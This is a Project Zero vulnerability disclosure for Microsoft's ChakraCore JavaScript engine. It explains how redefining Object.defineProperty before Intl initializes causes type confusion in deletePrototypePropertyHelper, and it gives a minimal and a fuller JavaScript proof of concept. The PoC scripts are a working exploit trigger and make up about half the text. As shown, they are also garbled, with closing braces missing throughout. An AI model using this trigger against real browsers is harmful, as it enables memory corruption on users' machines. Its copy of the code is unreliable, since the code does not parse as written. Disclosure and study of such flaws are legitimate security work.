Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=972
In Chakra, Internationlization is initialized the first time the Intl object is used, by executing the script in Intl.js (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/InJavascript/Intl.js). This code attempts to prevent Object methods from being redefined by user scripts, but there are a few stray calls to Object.defineProperty in initialization. If Object.defineProperty is redefined before Intl is initialized, a user-define method can be called during initialization. If this method defines a Collator (or DateTimeFormat or NumberFormat) getter and setter on the Intl object, it can intercept what it is set to, and set it to a different value instead. This will then cause type confusion in IntlEngineInterfaceExtensionObject::deletePrototypePropertyHelper (https://github.com/Microsoft/ChakraCore/blob/master/lib/Runtime/Library/IntlEngineInterfaceExtensionObject.cpp), as this function assumes the properties of a Collator are objects, when they are not guaranteed to be. A minimal PoC is as follows, and a full PoC is attached.
var d = Object.defineProperty;
var noobj = {
get: function () {
return 0x1234567 >> 1;
set: function () {
function f(){
var i = Intl;
Intl= {}; // this somehow prevents an exception that prevents laoding
d(i, "Collator", noobj);
Object.defineProperty = f;
var q = new Intl.NumberFormat(["en"]);
var d = Object.defineProperty;
var noobj = {
get: function () {
print("in get no");
return 0x1234567 >> 1;
set: function () {
print("in set no");
function f(...a){
var i = Intl;
Intl= {};
d(i, "Collator", noobj);
var pattern = {
get: function () {
return f;
set: function () {
Object.defineProperty(Object, "defineProperty", pattern);
var q = new Intl.NumberFormat(["en"]);